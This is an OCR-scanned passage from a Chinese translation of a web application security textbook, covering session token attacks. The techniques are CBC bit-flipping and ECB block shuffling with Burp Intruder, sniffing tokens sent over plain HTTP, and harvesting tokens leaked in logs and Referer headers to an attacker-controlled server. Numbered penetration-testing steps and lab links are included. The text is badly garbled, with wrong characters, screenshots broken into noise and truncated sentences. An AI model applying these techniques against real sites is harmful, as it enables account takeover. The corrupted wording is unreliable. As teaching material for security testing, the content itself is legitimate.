实际 上 与 原始 的 用 户 标 识 符 无 关 。 这 些 请 求 与 包 售 uid 的 令 牌 分 组 对 
应 。 某 些 情况 下 ， 应 用 程序 仅 显 示 “ 未 知 用 户 ”， 表 示 经 过 修改 的 uid 没 有 
对 应 的 实际 用 户 ， 因 此 攻击 将 会 失败 。 其 他 情况 下 ， 应 用 程序 会 显示 其 
他 注册 用 户 的 名 称 ， 这 说 明 攻 击 已 取得 成 功 。 攻 击 结 果 如 图 7-8 所 示 。 
我 们 在 其 中 定义 了 一 个 “提取 grep” 列 来 显示 登录 用 户 的 标识 从 ， 并 设置 
过 小 占 来 隐藏 将 应 用 程序 重 定 同 到 登录 页 面 的 啊 应 。 

















此 ， 






atack save columns 


(resus | target | positions Pesos pn 


00900 








Filter: hiding 3x responses 























<br><br><a hret="HyDerails. ashx" ‘>Your Tr a><br><a 
href="ChanyePassvord. ashx">Change password</a><br><a 
href="Logout .ashx">Logout</ a><br></body></html> 


























图 7-8 “攻击 加 密令 牌 的 成 功 "位 翻转 "攻击 ， 


iso etasosrercrs03. 200 | J 11313 unknownuse. | | 
109 Dé 1A58376E2F903- Ee Oe 


ous De wsesrerzr009.[200 |) | Ets? | JohnHerman | ossos s 
206 [D81458378F2F903.|200 | | | 国 1313 |unknownucer. | | 
p oe alae e ft 


确定 存在 的 漏洞 后 就 可 以 通过 更 有 针对 性 的 攻击 来 利用 该 漏洞 。 为 


需要 从 结果 中 确定 ， 如 果 用 户 的 资料 发 生变 化 ， 加 密 


令 牌 中 的 哪个 


数据 块 会 发 生变 化 。 然 后 ， AT 他 值 。 
这 时 ， 可 以 使 用 Burp Intrude 冲 的 “数字 ”有 效 载 集 类 


A IF 
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> 注解 ”一些 应 用 程序 经 常 加 密 请 求 参 数 中 的 有 意义 数据 
(如 商品 的 价格 》， 以 防止 攻击 者 算 改 这 些 数据 。 如 下 加 密 数据 明 
显 在 应 用 程序 的 功能 中 发 挥 着 重要 作用 ， 这 时 应 尝试 实施 “位 翻 
转 ” 攻 击 ， 看 是 否 能 够 以 有 意义 的 方式 操纵 加 密 信 息 ， 从 而 达到 破 
坏 应 用 程序 逻辑 的 目的 。 


当然 ， 利 用 本 节 所 述 的 漏洞 的 主要 目的 是 伪装 成 其 他 应 用 程序 用 户 
最 好 是 拥有 较 高 权限 的 管理 用 户 。 如 果 只 能 盲目 修改 加 密令 牌 的 某 
些 部 分 ， 则 攻击 能 人 耕 取 得 成 功 ， 只 能 徘 运 气 。 但 是 ， 某 些 情况 下 ， 应 用 
程序 可 能 会 为 你 提供 一 些 “ 提 示 ”。 如 采 应 用 程序 采用 对 称 加 密 防 止 用 户 
和 修改 数据 ， 则 通 稼 整个 应 用 程序 都 会 使 用 相同 的 加 密 算 法 和 密 铀 。 在 这 
种 情况 下 ， 如 果 应 用 程序 的 任何 功能 回 用 户 披露 了 任意 加 密 凶 符 串 的 解 
密 值 ， 则 可 以 利用 这 一 “提示 ”完全 解密 任何 受 保护 的 信息 。 

以 笔者 发 现 的 一 个 提供 文件 上 传 /下 载 功 能 的 应 用 程序 为 例 。 上 传 
文件 后 ， 用 户 将 获得 一 个 包含 文件 名 参数 的 下 载 链接 。 为 防止 修改 文件 
路 径 的 各 种 攻击 ， 应 用 程序 对 这 个 参数 中 的 文件 名 进行 加 密 。 但 是 ， 如 
打 用 户 请 求 一 个 已 删除 的 文件 ， 应 用 程序 将 显示 一 条 错误 消 轧 ， 在 其 中 
显示 所 请 求 文件 的 解密 名 称 。 攻 击 者 对 这 种 行为 加 以 利用 就 可 以 确定 应 
用 程序 使 用 的 任何 加 密 字 符 中 的 明文 值 ， 包 括 会 话 令 牌 的 值 。 笔 者 发 
现 ， 该 应 用 程序 的 会 话 令 牌 包 合 各 种 有 意义 的 值 ( 具 有 结构 化 的 格 
式 ) ， 因 此 ， 易 于 受到 本 节 所 述 的 各 种 攻击 。 由 于 这 些 值 属于 文本 格式 
的 用 户 名 和 应 用 程序 角色 ， 而 不 是 数字 标识 符 ， 因 此 ， 仅 仅 使 用 言 目的 
位 翻转 很 难 对 其 实施 成 功 的 攻击 。 但 是 ， 通 过 使 用 文件 名 解密 函数 束 可 
以 在 查看 结果 的 同时 ， 对 令 牌 的 数据 位 进行 系统 地 修改 。 这 样 就 可 以 构 
造 一 个 令 牌 ， 该 令 牌 一 旦 解密 将 指定 有 效 的 用 户 和 管理 角色 ， 从 而 完全 
控制 整个 应 用 程序 。 
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=> 注解 还 可 以 使 用 其 他 技巧 来 解密 应 用 程序 使 用 的 加 密 数 
据 。 例 如 ， 利 用 一 个 “揭示 性 ”加 密 提 示 (“reveal”encryption 
oracle) 可 获得 加 密令 牌 的 明文 值 。 虽 然 在 解密 密码 时 ， 这 可 能 是 
一 个 重要 的 漏洞 ， 但 是 ， 解 密会 话 令 牌 并 不 会 使 攻击 者 能 够 立即 攻 
破 其 他 用 户 的 会 话 。 不 过 ， 解 密令 牌 有 助 于 攻击 者 了 解 明 文 的 结 
构 ， 帮 助 他 们 实施 针对 性 的 “位 翻转 ”攻击 。 有 关 “ 揭 示 ? 加 密 提 示 攻 
击 的 详细 信息 ， 请 参阅 第 11 章 。 

针对 填充 提示 (padding oracle) 的 劳 路 攻击 可 用 于 破解 加 密令 

牌 。 请 参阅 第 18 章 了 解 详 细 信息 。 


























渗透 测试 步 又 


许多 时 候 ， 在 应 用 程序 采用 加 密令 牌 时 ， 具 体 的 攻击 方法 可 能 
要 取决 于 各 种 因素 ， 包 插 分 组 边界 相对 于 攻击 的 数据 的 偏 移 值 ， 以 
及 应 用 程序 是 耕 允 许 修 改 明文 的 结构 。 完 全 盲目 地 开始 攻击 将 很 难 
实施 有 效 的 攻击 ， 但 在 许多 情况 下 ， 这 种 攻击 也 可 能 会 考 效 。 

(1) 除非 会 话 令 牌 明显 有 意义 或 本 身 是 连续 的 ， 否 则 应 始终 
考虑 令 牌 被 加 密 的 可 能 性 。 通 常 ， 通 过 注册 几 个 不 同 的 用 户 名 ， 并 
在 用 户 名 中 每 次 添加 一 个 字符 ， 就 可 以 确定 应 用 程序 是 否 末 用 分 组 
密码 。 如 果 添 加 一 个 字符 会 导致 会 话 令 牌 的 长 度 增加 8 或 16 个 字 
节 ， 这 说 明 应 用 程序 可 能 使 用 的 是 分 组 密码 。 要 确认 这 一 点 ， 可 以 
丛 续 福 用 记名 中 深 加 子 广 ， 看 随后 会 语 信 牌 是 全 会 同样 增加 8 或 16 
NFAT 

(2) 通常 ， 在 讶 目的 情况 下 ， 很 难 确定 并 利用 ECB 密 码 操 纵 
漏洞 。 但 是 ， 可 以 党 斌 盲目 地 复制 并 移动 令 牌 中 的 密 文 分 组 ， 并 碍 
看 能 否 能 够 以 目 己 的 用 户 账 户 或 其 他 用 户 账户 登录 应 用 程序 ， 或 根 
本 无 法 登录 应 用 程序 。 

(3) 你 可 以 通过 使 用 “位 翻转 "有效 载 倚 源 对 整个 令 脾 实施 
Burp Intruder 攻 击 ， 测 试 应 用 程序 是 否 存在 CBC 密 码 操纵 漏洞 。 如 
果 位 翻转 确定 了 令 牌 中 的 某 个 部 分 ， 并 且 修 改 该 部 分 后 仍然 能 够 以 
其 他 用 户 或 不 存在 的 用 户 喘 份 访 问 有 效 会 话 ， 那 么 ， 攻 击 者 可 以 扩 
i eager nl 
He. 

(4) 在 上 述 两 种 攻击 过 程 中 ， 监 视 应 用 程序 的 啊 应 ， 确 定 与 
提交 的 每 个 请 求生 成 的 会 话 有 关 的 用 户 ， 并 尝试 利用 任何 机 会 来 提 
升 目 己 的 权限 。 

(5) 如果 攻击 并 未 奏效 ， 但 通过 步骤 1 得 知 ， 攻 击 者 提交 的 长 
度 可 变 的 输入 已 被 合并 到 令 牌 中 ， 这 时 ， 应 答 试 每 次 增加 一 个 字 
符 ， 直 到 达到 所 使 用 的 分 组 的 大 小 ， 以 生成 一 系列 令 牌 。 然 后 ， 对 
于 每 个 生成 的 令 牌 ， 应 执行 步骤 (2) 和 步骤 (3) 。 这 将 增加 需要 
修改 的 数据 恰好 与 分 组 边界 对 齐 的 机 率 ， 帮 助 你 实施 成 功 的 攻击 。 






































不 管 应 用 程序 如 何 确 保 它 生成 的 令 牌 不 包含 任何 有 意义 的 信息 ， 并 
且 很 难 加 以 分 析 或 预测 ， 但 如 果 生 成 令 牌 后 不 对 其 小 心 处 理 ， 它 的 会 话 
机 制 仍然 易于 受到 各 种 攻击 。 例 如 ， 如 果 以 茶 种 方式 将 令 牌 透露 给 攻击 
者 ， 那 么 即使 攻击 者 无 法 预测 令 牌 ， 也 仍然 能 够 劫持 用 户 的 会 话 。 

应 用 程序 以 不 安全 的 方式 处 理 令 牌 ， 致 使 令 牌 易 于 遭受 多 种 攻击 。 


BE oe ee, ee 
会 泄露 给 第 三 方 。” 
正确 使 用 SSL 确 实 有 助 于 防止 会 话 令 牌 被 拦截 。 但 是 ， 即 
使 采用 SSL， 我 们 犯 下 的 各 种 错误 仍然 可 导致 令 牌 以 明文 形式 
伟 输 。 因 此 ， 攻 击 者 可 对 终端 用 户 实施 各 种 直接 站 市， 奖 得 他 
PTAA Fe 





= EAMA “我 们 的 令 牌 由 采用 成 熟 、 可 徘 加 密 技术 的 平台 
生成 ， 因 此 不 可 能 被 攻破 。” 





默认 情况 下 ， 应 用 程序 服务 器 会 在 用 户 初 次 访问 站 点 时 创 
奸 一 个 会 话 cookie， 并 将 此 cookie 用 于 用 户 与 站 点 的 所 有 交 
互 。 我 们 在 下 面 的 章节 中 将 讲 到 ， 这 可 能 会 导致 令 牌 处 理 方面 
的 各 种 安全 漏洞 。 








如 果 通 过 网 络 以 非 加 密 方式 传送 会 话 令 牌 ， 束 会 产生 这 方面 的 漏 
洞 ， 人 允许 处 在 适当 位 置 的 伪 听 者 能 够 截获 令 牌 并 因此 伪装 成 合法 用 户 。 
禄 听 的 适当 位 置 包括 用 户 的 本 地 网 络 、 用 户 所 在 的 IT 部 门 、 用 户 的 











ISP、 因 特 网 骨干 网 、 应 用 程序 的 ISP 和 运行 应 用 程序 组 织 的 IT 部 门 。 处 
在 上 述 任何 一 个 位 置 ， 相 关 组 织 的 授权 人 员 和 任何 攻破 相关 基础 架构 的 
外 部 攻击 者 都 可 以 截取 会 话 令 牌 。 

在 最 简单 的 情形 中 ， 应 用 程序 使 用 一 个 非 加密 的 HTTP 连接 进行 通 
信 。 这 使 攻击 者 能 够 拦截 客户 端 和 服务 器 间 传 送 的 所 有 数据 ， 包 括 登 录 
证 书 、 个 人 信息 、 支 付 细 节 等 。 这 时 ， 攻 击 者 通常 不 必 攻 击 用 户 的 会 
话 ， 因 为 攻击 者 已 经 可 以 查阅 特权 信息 ， 并 能 够 使 用 截获 的 证 书 登 录 ， 
从 而 执行 其 他 恶意 操作 。 然 而 ， 有 些 时 候 ， 用 户 的 会 话 仍然 是 攻击 者 的 
主要 攻击 目标 。 例 如 ， 如 果 截 获 的 证 书 不 足以 执行 第 二 次 登录 (如 银行 
应 用 程序 可 能 要 求 登录 者 提交 在 不 断 变 化 的 物理 令 牌 上 显示 的 一 串 数 
字 ， 或 者 用 户 PIN 号 码 中 的 几 个 特殊 数字 ) ， 这 时 攻击 者 如 果 想 执行 任 
意 操作 ， 就 必须 劫持 他 窃听 的 会 话 。 或 者 如 果 登 录 机 制 实施 严格 的 审 
查 ， 并 且 在 每 次 成 功 登录 后 通知 用 户 ， 那 么 攻击 者 可 能 希望 避免 自己 登 
录 ， 以 尽 可 能 保持 活动 的 隐秘 性 。 

在 其 他 情况 下 ， 使 用 HTTPS 保 护 关 键 客户 端 -服务 器 通信 的 应 用 程 
序 的 会 话 令 牌 仍然 可 能 在 网 络 上 遭 到 拦截 。 这 种 薄弱 环节 表现 形式 各 
人 
俞 机 制 | 时 o 

口 一 些 应 用 程序 在 登录 阶段 选择 使 用 HTTPS 保 护 用 户 证 书 的 安全 ， 
但 在 用 户 会 话 的 其 他 阶段 转 而 使 用 HTTP。 许 多 Web 邮 件 应 用 程序 以 这 
种 方式 运作 。 在 这 种 情况 下 ， 究 听 者 无 法 拦截 用 户 的 证 书 ， 但 仍然 可 以 
截获 会 话 令 牌 。Firefox 的 插件 Firesheep 工 具 会 让 这 一 过 程 变 得 轻 而 易 
举 


口 一 些 应 用 程序 在 站 点 中 预先 通过 验证 的 区 域 ( 如 站 点 首页 ) 使 用 
HTTP， 但 从 登录 页 面 开 始 转换 到 HTTPS。 然 而 ， 许 多 时 候 ， 应 用 程序 
在 用 户 访问 第 一 个 页 面 时 就 给 他 发 布 一 个 会 话 令 牌 ， 并 且 在 用 户 登 录 时 
也 不 修改 这 个 令 牌 。 最 初 并 未 通过 验证 的 用 户 会 话 在 登录 后 却 被 升级 为 
通过 验证 的 会 话 。 在 这 种 情况 下 ， 寡 听 者 就 可 以 在 登录 前 拦截 用 户 的 令 
牌 ， 等 待 用户 转换 到 HTTPS 进 行 通信 《表示 用 户 正在 登录 ) 然后 尝试 使 
用 那个 令 牌 访问 一 个 受 保护 的 页 面 〈 如 “我 的 账户 >) 。 

口 即使 应 用 程序 在 用 户 成 功 登 录 后 发 布 一 个 新 令 牌 ， 并 从 登录 页 面 
开始 使 用 HTTPS， 但 是 ， 如 果 用 户 通过 单 击 验证 区 域 中 的 一 个 链接 、 使 
用 “后 退 ” 按 钮 或 者 直接 输入 URL， 重 新 访问 一 个 预先 验证 的 页 面 
(如 “帮助 ?或 关于” 页面) ， 用 户 通过 验证 的 会 话 令 牌 仍 有 可 能 泄露 。 

O 与 前 面 的 情况 稍 有 不 同 ， 应 用 程序 可 能 在 用 户 单 击 登 录 链 接 后 转 
换 到 HTTPS。 然 而 ， 如 果 用 户 对 URL 进 行 相应 修改 ， 应 用 程序 仍然 接受 
通过 HTTP 进 行 登录 。 这 时 ， 处 在 适当 位 置 的 攻击 者 就 可 以 修改 站 点 预 



































先 通过 验证 的 区 域 返 回 的 页 面 ， 使 登录 链接 指向 一 个 HTTP 页 面 。 即 使 
应 用 程序 在 用 户 成 功 登 录 后 发 布 一 个 新 令 牌 ， 如 果 攻 击 者 已 成 功 将 用 户 
的 链接 降级 为 HITP， 他 仍然 能 够 拦截 这 个 令 牌 。 

口 一 些 应 用 程序 对 应 用 程序 内 的 全 部 静态 内 容 〈 如 图 像 、 脚 本 、 样 
式 表 和 页 面 模板 ) 使 用 HTTP。 如 果 出 现 这 种 行为 ， 用 户 的 浏览 器 将 显 
示 一 条 警告 消息 ， 如 图 7-9 所 示 。 当 浏览 器 显示 此 警告 时 ， 它 已 经 通过 
HTTP 获 取 了 相关 数据 项 ， 因 而 已 经 传送 了 会 话 令 牌 。 浏 览 器 显示 警告 
是 为 了 让 用 户 拒 绝 处 理 已 通过 HTTP 接 收 到 并 因此 可 能 受到 污染 的 响应 
数据 。 如 前 所 述 ， 如 果 用 户 的 浏览 器 通过 HTTP 访 问 一 个 资源 ， 并 使 用 
这 个 令 有 牌 通过 HTTPS 访 问 站 点 中 受 保护 的 非 静 态 区 域 ， 攻 击 者 就 能 拦截 
该 用 户 的 会 话 令 牌 。 


Security Warning 











及 Do you want to view only the webpage content that was delivered 
D securely? 


This webpage contains content that will not be delivered usina a secure HTTPS 
connection, which could compromise the security of the entire webpage 


(ies tte = 


图 7-9 如果 一 个 通过 HTTPS 访 问 的 页 面包 含 通过 HTTP 访 问 的 数据 ， 浏 览 器 将 显示 
一 条 警报 消息 






































口 即使 应 用 程序 在 每 一 个 页 面 (包括 站 点 中 未 通过 验证 的 区 域 和 老 
SAA) 都 使 用 HTTPS， 有 些 情 况 下 ， 用 户 的 令 脾 仍然 通过 HTTP 传 
送 。 如 果 攻 击 者 能 够 以 某 种 方式 诱 使 用 户 通 过 HTTP 提 出 一 个 请 求 〈 或 
者 是 请 求 相同 服务 器 上 运行 的 HTTP 服 务 ， 或 者 是 访问 
http://server:443/) ， 那 么 用 户 就 可 能 在 这 个 过 程 中 提交 令 牧 。 这 时 ， 攻 
击 者 可 以 采用 的 攻击 手段 包括 在 一 封 电子 邮件 或 即时 消息 中 给 用 户 发 送 
一 个 URL， 在 他 控制 的 一 个 Web 站 点 中 插入 一 个 自动 加 载 的 链接 ， 或 者 
使 用 可 单 击 的 横幅 广告 。“《〈 请 参阅 第 12 章 和 第 13 章 了 解 使 用 这 种 技巧 对 
其 他 用 户 实施 攻击 的 详细 内 容 。) 








渗透 测试 步 又 


G) 以 正常 方式 访问 应 用 程序 ， 从 第 一 个 进入 点 (“起 
始 "URL) 开始 ， 接 着 是 登录 过 程 ， 然 后 是 应 用 程序 的 全 部 功能 。 
记录 每 一 个 被 访问 的 URL 以 及 收 到 新 会 话 令 牌 的 每 种 场合 。 特 别 注 
意 登 录 功 能 及 HTTP 与 HITPS 通 信之 间 的 转换 。 可 以 使 用 网 络 嗅 探 
器 〈 如 Wireshark) 手动 或 使 用 拦截 代理 服务 器 中 的 日 志 功 能 部 分 自 
动 完 成 这 一 任务 ， 如 图 7-10 所 示 。 
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(2) 如 果 应 用 程序 使 用 HTTP cookie 传 送 会 话 令 牌 ， 那 么 应 确 
认 其 是 否 设置 了 secure 标 记 ， 防 止 它们 通过 非 加 密 连 接 传送 令 牌 。 

(3) 在 正常 使 用 应 用 程序 的 情况 下， 确定 会 话 令 牌 是 否 通 过 
非 加 和 密 连接 传送 。 如 果 确 实 如 此 ， 应 将 其 视 为 易于 受到 拦截 。 

(4) 如 果 起 始 页 面 使 用 HTTP， 然 后 在 登录 和 站 点 中 通过 验证 
的 区 域 转换 到 HTTPS， 确 认 应 用 程序 是 否 在 用 户 登 录 后 发 布 一 个 新 
令 牌 或 者 在 使 用 HTTP 阶 段 传 送 的 令 牌 是 否 仍 被 用 于 追踪 用 户 通 
过 验证 的 会 话 。 同 时 确认 ， 如 果 对 登录 URL 进 行 相应 修改 ， 应 用 程 
序 是 否 接受 通过 HTTP 登 录 。 

(5〉 即 使 应 用 程序 在 每 一 个 页 面 使 用 HTTPS， 确认 服 务 器 是 
否 还 监听 80 端 口 ， 通 过 它 运 行 任何 服务 或 内 容 。 如 果 是 这 样 ， 直 接 
人 


(6) 如 有 果 通 过 HTTP 将 通过 验证 会 话 的 令 牌 传送 给 服务 器 ， 确 
认 该 令 牌 是 否 继续 有 效 ， 或 者 立即 被 服务 需 终 止 。 

















A yn.) 
笑 试 访问 
http://mdsec.net/auth/369/ 


http://mdsec.net/auth/372/ 
http://mdsec.net/auth/374/ 


7.3.2 ”在 日 志 中 泄露 令 





除 在 网 络 通信 中 明文 传送 会 话 令 牌 外 ， 各 种 系统 日 志 也 常 弟 将 令 牌 
泄露 给 未 授权 方 。 虽 然 这 种 情况 很 少 发 生 ， 但 由 于 除了 处 在 网 络 适 当 位 
置 的 贸 听 者 之 外 ， 还 有 其 他 各 种 淤 在 的 攻击 者 都 能 查阅 这 些 日 志 ， 这 种 
泄露 通常 会 造成 更 严重 的 后 末 。 

许多 应 用 程序 为 管理 员 和 其 他 文 持 人 员 提 供 监控 和 控制 应 用 程序 运 
行 时 状态 〈 包 括 用 户 会 话 ) 的 功能 。 例 如 ， 帮 助 用 户 解决 疑难 的 服务 台 
工作 人 员 可 能 会 要 求 用 户 提 供用 户 名 、 通 过 列表 或 搜索 功能 定位 他 们 当 
前 的 会 话 ， 并 奉 看 与 会 话 有 关 的 细节 。 或 者 管理 员 可 能 会 在 调查 一 起 违 
反 安 全 事件 的 过 程 中 查询 最 近 会 话 的 日 志 记 录 。 通 常 ， 这 种 监控 和 控制 
功能 会 泄露 每 个 会 话 的 令 牌 。 而 且 ， 这 种 功能 一 般 没 有 得 到 良好 的 保 
A A ree 
户 的 会 话 。 

会 话 令 牌 出 现在 系统 日 志 中 的 另 一 个 主要 原因 是 应 用 程序 使 用 URL 
查询 字符 串 ， 而 不 是 使 用 HTTP cookie 或 POST 请 求 主 体 作为 令 牌 传输 机 
制 。 例 如 ， 在 Google 上 查询 inurl: jsessionid 即 可 确定 数 千 个 在 以 下 URL 
中 传送 Java 平 台 会 话 令 牌 〈 称 作 jsessionid) 的 应 用 程序 : 

http:/www.webjunction.org/do/Navigation;jsessionid= 

F27ED2A6AAE4C6DA409A3044E79B8B48?category=327 

如 果 应 用 程序 以 这 种 方式 传送 会 话 令 牌 ， 它 们 的 会 话 令 牌 就 可 能 
现在 各 种 未 授权 用 户 能 够 访问 的 系统 日 志 中 ， 例 如 : 

口 用 户 浏览 器 的 日 志 ; 

口 Web 服 务 器 日 记 ; 

口 企业 或 ISP 代 理 服 务 器 日 志 ; 























口 任何 在 应 用 程序 主机 环境 中 采用 的 反问 代理 的 日 志 ; 
口 应 用 程序 用 户 通 过 单 击 站 外 链接 访问 的 任何 服务 器 的 Referer 日 
志 ， 如 图 7-11 所 示 。 
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Pq7-11 ” 当 会 话 令 牌 出 现在 URL 中 时 ， 只 要 用 户 点 击 站 外 链接 或 浏览 器 加 载 站 外 资 
源 ， 会 话 令 牌 就 会 在 Referer 消 息 头 中 传送 
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即使 整个 应 用 程序 都 使 用 HTTPS， 这 些 漏洞 仍 有 可 能 出 现 。 

上 面 描述 的 最 后 一 种 情况 为 攻击 者 提供 了 一 种 截获 应 用 程序 会 话 令 
脾 的 非常 有 效 的 方法 。 例 如 ， 如 果 一 个 Web 邮 件 应 用 程序 在 URL 中 传送 
会 话 令 牌 ， 那 么 攻击 者 就 可 以 问 应 用 程序 的 用 户 发 送 一 封 电子 邮件 ， 在 
里 面包 含 一 个 连接 到 他 控制 的 Web 服务 器 的 链接 。 如 采 任 何 用 户 访问 这 
个 链接 《〈 如 单 击 它 ， 或 者 他 们 的 浏览 器 加 载 了 包含 在 HIML 格 式 的 电子 
邮件 中 的 图 像 )》， 攻 击 者 就 会 实时 收 到 该 用 户 的 会 话 令 牌 。 然 后 ， 攻 击 
者 只 需 在 他 的 服务 器 上 运行 一 段 脚 本 ， 惑 可 以 劫持 每 一 个 令 牌 的 会 话 ， 
并 执行 某 种 恶意 操作 ， 如 发 送 记 圾 邮件 、 获 取 个 人 信息 或 修改 密码 。 


menye 
SA 

£ 注解 ”人 退 踊 通过 HTTPS 访 问 的 页 面 中 包含 的 站 外 链接 时 ， 
当前 版 本 的 Internet nid 并 不 包含 Referer 消 息 头 。 在 这 种 情况 
下 ， 只 要 站 外 链接 也 通过 HTTPS 访 问 ， 即 使 它 属于 另 一 个 域 ， 
Firefox 中 也 包含 Referer 消 息 头 。 因 此 ， 即 使 使 用 SSL， 插 入 在 URL 
中 的 敏感 数据 也 容易 在 Referer 日 志 中 泄露 。 


渗透 测试 步 又 


G) 确定 应 用 程序 的 所 有 功能 ， 找 出 可 查看 会 话 令 牌 的 任何 
日 志 或 监控 功能 。 查 明 谁 能 够 访问 这 种 功能 ， 例 如 管理 员 、 任 何 通 
过 验证 的 用 户 或 匿名 用 户 。 请 参阅 第 4 章 了 解 发 现在 主 应 用 程序 中 
没有 建立 直接 链接 的 隐藏 内 容 的 技巧 。 

(2) 确定 应 用 程序 使 用 UREL 中 传送 会 话 令 牌 的 任何 情况 。 可 
能 应 用 程序 通常 以 更 加 安全 的 方式 传送 令 牌 ， 但 开发 者 在 特定 情况 
下 使 用 URL 来 解雇 特殊 难题 。 例 如 ，Web 应 用 程序 与 外 部 系统 交互 
时 通常 会 出 现 这 种 情况 。 

(3) 如 果 应 用 程序 在 URL 中 传送 会 话 令 牌 ， 演 试 发 现任 何人 允 
许 在 其 他 用 户 查 阅 的 页 面 中 注入 任意 站 外 链接 的 应 用 程序 功能 ， 例 
如 公告 牌 、 站 点 反馈 、 问 与 答 等 功能 。 如 果 可 以 ， 回 一 个 受 控制 的 
Web 服 务 器 提交 链接 ， 等 待 一 段 时 间 ， 看 Referer 日 志 中 是 耕 收 到 任 
何 用 户 的 会 话 令 牌 。 

(4) 如果 和 截获 到 任何 会 话 令 牌 ， 演 试 通过 正和 使 用 应 用 程 
序 ， 而 不 是 用 截获 的 令 牌 代 蔡 上 自己 的 令 牌 来 劫持 用 户 的 会 话 。 可 以 
通过 拦截 服务 器 返回 的 下 一 个 啊 应 ， 并 使 用 截获 的 cookie 值 添加 自 
己 的 Set-Cookie 消 息 头 ， 以 实现 这 一 目的 。 在 Burp 中 ， 可 以 应 用 一 
个 Suite 范 围 的 配置 ， 在 所 有 指 回 目标 应 用 程序 的 请 求 中 设置 一 个 特 
殊 cookie， 以 便 测 试 期 间 在 不 同 的 会 话 之 则 轻松 切换 。 

(5) WRB KES, FHAA Pea Wa 
问 他 们 的 敏感 数据 COOSA. Ste aA Peng), RE 
T 目 动 技巧 获得 想 要 的 、 属 于 其 他 应 用 程序 用 户 的 
数据 。 























尝试 访问 


http://mdsec.net/auth/379/ 








由 于 应 用 程序 在 将 生成 和 处 理 的 会 话 令 牌 与 令 牌 所 属 的 用 户 会 话 之 
See 会 话 管理 机 制 因此 存在 各 种 常见 的 
漏洞 

最 简单 的 漏洞 是 允许 给 同一 个 用 户 账户 同时 分 配 儿 个 有 效 的 令 牌 。 
在 几乎 每 一 个 应 用 程序 中 ， 任 何 用 户 都 没有 正当 理由 在 任何 指定 的 时 间 
拥有 多 个 会 话 。 当 然 ， 用 户 可 以 终止 一 个 处 于 活动 状态 的 会 话 ， 再 开始 
ms th, RAIL, PION, KAA A a Bt RRASA — BUPA 

。 但 是 ， 如 果 一 名 用 户 明 显 同时 在 使 用 两 个 不 同 的 会 话 ， 这 通 第 表示 
Hy 要 么 是 因为 用 户 将 证 书 泄露 给 了 第 三 方 ， 要 么 是 攻击 
者 通过 其 他 某 种 途径 获得 了 他 的 证 书 。 无 论 发 生 哪 一 种 情况 ， 都 不 应 允 
许 并 行 会 话 ， 因 为 它 允 许 用 户 持续 执行 任何 非法 操作 ， 同 时 允许 攻击 者 
使 用 截获 的 证 书 ， 却 不 存在 被 检测 出 来 的 风险 。 

应 用 程序 使 用 “静态 ” 令 牌 是 一 种 相对 较为 特殊 的 缺陷 。 这 些 “ 令 
牌 ?看 似 会 话 令 牌 ， 最 初 表 现 的 功能 和 会 话 令 牌 一 样 ， 但 实际 并 非 如 
此 。 在 这 些 应 用 程序 中 ， 每 名 用 尸 都 分 配 有 一 个 令 牌 ， 并 且 用 户 每 次 登 
录 ， 都 收 到 相同 的 令 牌 。 无 论 用 户 是 人 否 已 经 登录 并 获得 令 牌 ， 应 用 程序 
都 应 将 该 令 牌 视 为 有 效 令 牌 。 这 种 应 用 程序 实际 上 是 对 会 话 的 整体 概念 
以 及 这 样 做 有 助 于 管理 和 控制 应 用 程序 访问 存 有 误解 。 有 些 时 候 ， 应 用 
程序 这 样 运作 ， 是 为 了 执行 设计 上 存在 缺陷 的 “ 记 住 我 ?功能 ， 并 因此 将 
静态 令 牌 保存 在 一 个 持久 性 cookie 中 请 参阅 第 6 章 了 解 相 关内 容 ) 。 有 
时 ， 令 脾 本 映 易 于 受到 预测 攻击 ， 致 使 这 种 漏洞 造成 更 加 严重 的 后 果 ， 
因为 一 次 成 功 的 攻击 不 仅 能 够 攻破 当前 登录 用 户 的 会 话 ， 如 果 时 间 允 
许 ， 还 能 攻破 所 有 注册 用 户 的 账户 。 

我 们 偶尔 也 会 观察 到 应 用 程序 表现 出 其 他 奇怪 的 行为 ， 表 明令 牌 和 
会 话 之 间 的 对 应 关系 存在 基本 的 缺陷。 根据 用 户 名 和 一 个 随机 成 分 构造 

















的 有 意义 令 牌 就 是 一 个 典型 的 示例 。 以 下 面 的 令 脾 为 例 : 
dXN1 cj 1kYWY7 cj ESMTMwOTOxODEyMTMO NTKwMTI= 
对 其 进行 Base64 编 码 ， 得 到 : 
user=daf;r1=13094181213459012 


对 成 分 r1 进 行 仔细 分 析 后 ， 我 们 可 以 得 出 结论 : i 
其 进行 预测 。 然 而 ， 如 果 应 用 程序 的 会 话 处 理 馆 辑 存 在 缺陷 ， 可 能 攻击 
者 只 需 向 41 和 use 提交 任何 有 效 的 值 ， 训 可 以 在 指定 用 户 的 权 眼 下 二 站 
一 个 会 话 。 从 本 质 上 讲 ， 这 是 一 个 访问 控制 漏洞 ， 因 为 应 用 程序 是 根据 
用 户 在 会 话 之 外 提交 的 数据 做 出 的 访问 决定 〈 请 参阅 第 8 草 了 解 相 关 斥 
容 ) 。 产 生 这 种 漏洞 是 因为 应 用 程序 使 用 会 话 令 牌 表明 请 求 者 已 经 与 应 
用 程序 建立 某 种 有 效 的 会 话 ， 然 而 ， 处 理会 话 的 用 户 权限 并 不 由 会 话 控 
制 ， 而 是 通过 其 他 方式 根据 每 个 请 求 决定 。 在 这 种 情况 下 ， 请 求 者 直接 
控制 决定 用 己 权 限 的 方式 。 

















渗透 测试 步 又 


CO 用 相同 的 用 户 账户 从 不 同 的 浏览 器 进程 或 从 不 同 的 计算 
机 两 次 登录 应 用 程序 。 确 定 这 两 个 会 话 是 人 否 都 处 于 活动 状态 。 如 宋 
是 ， 表 示 应 用 程序 支持 并 行 会 话 ， 这 样 攻破 其 他 用 户 证 书 的 攻击 者 
能 够 利用 这 些 证 书 ， 而 不 会 有 被 检测 出 来 的 风险 。 

(2) 用 相同 的 用 户 账户 从 不 同 的 浏览 器 进程 或 从 不 同 的 计算 
机 几 次 登录 和 退出 应 用 程序 。 确 定 应 用 程序 在 每 次 登录 时 是 发 布 一 
个 新 会 话 令 牌 ， 还 是 发 布 相同 的 令 牌 。 如 果 每 次 发 布 相同 的 令 牌 ， 
那么 应 用 程序 根本 没有 正确 使 用 令 牌 。 

(3) 如 果 令 牌 明显 包含 东 种 结构 和 意义 ， 设 法 将 标识 用 户 喘 
份 的 成 分 与 无 法 辨别 的 成 分 区 分 开 来 。 竺 试 修改 所 有 与 用 户 有 关 的 
令 牧 成分， 使 其 指 癌 其 他 已 知 的 应 用 程序 用 户 ， 确 定 修改 后 的 令 牌 
